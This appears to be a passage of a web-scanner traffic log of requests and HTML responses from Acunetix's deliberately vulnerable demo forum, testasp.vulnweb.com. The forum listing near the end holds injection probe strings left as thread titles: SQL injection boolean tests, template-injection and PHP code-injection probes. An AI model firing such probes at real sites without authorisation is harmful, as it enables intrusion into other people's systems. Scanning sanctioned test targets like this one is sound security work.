</tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 410 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:39 GMT Content-Length: 3673 |
Response Body - size: 3,673 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Search.asp |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/Search.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:38 GMT Content-Length: 2809 |
Response Body - size: 2,809 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Search.asp?tfSearch=YKSrENiG |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 478 bytes. |
GET http://testasp.vulnweb.com/Search.asp?tfSearch=YKSrENiG HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:01:11 GMT Content-Length: 2976 |
Response Body - size: 2,976 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <div class='path'>You searched for 'YKSrENiG'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 340 bytes. |
GET http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:39 GMT Content-Length: 2961 |
Response Body - size: 2,961 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <div class='path'>You searched for 'ZAP'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showforum.asp?id=0 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 324 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:38 GMT Content-Length: 17817 |
Response Body - size: 17,817 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Acunetix Web Vulnerability Scanner</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Acunetix Web Vulnerability Scanner </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:50 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>12345'"\'\");|]*</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:50 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:50 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'>-1 OR 3+627-627-1=0+0+0+1 -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:50 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'>'.print(md5(31337)).'</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:50 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:50 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=6'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=7'>1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%></a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=8'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=9'>-1 OR 3*2<(0+5+627-627) -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=10'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=11'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=12'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=13'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=14'>-1 OR 3*2>(0+5+627-627) -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=15'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=16'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=17'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=18'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=19'>-1 OR 2+497-497-1=0+0+0+1</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=20'>acx{{98991*97996}}xca</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=21'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=22'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=23'>-1 OR 3+497-497-1=0+0+0+1</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=24'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=25'>acx[[${98991*97996}]]xca</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=26'>-1 OR 3*2<(0+5+497-497)</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=27'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=28'>acx__${98991*97996}__::.x</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=29'>-1 OR 3*2>(0+5+497-497)</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=30'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=31'>-1' OR 2+737-737-1=0+0+0+1 -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=32'>"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=33'>-1' OR 3+737-737-1=0+0+0+1 -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:51 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=34'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:52 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=35'>-1' OR 3*2<(0+5+737-737) -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:52 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=36'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:52 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=37'>-1' OR 3*2>(0+5+737-737) -- </a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:52 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=38'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:52 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=39'>-1' OR 2+983-983-1=0+0+0+1 or '3dwOAUtS'='</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:52 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=40'>-1' OR 3+983-983-1=0+0+0+1 or '3dwOAUtS'='</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:52 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=41'>-1' OR 3*2<(0+5+983-983) or '3dwOAUtS'='</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:14:53 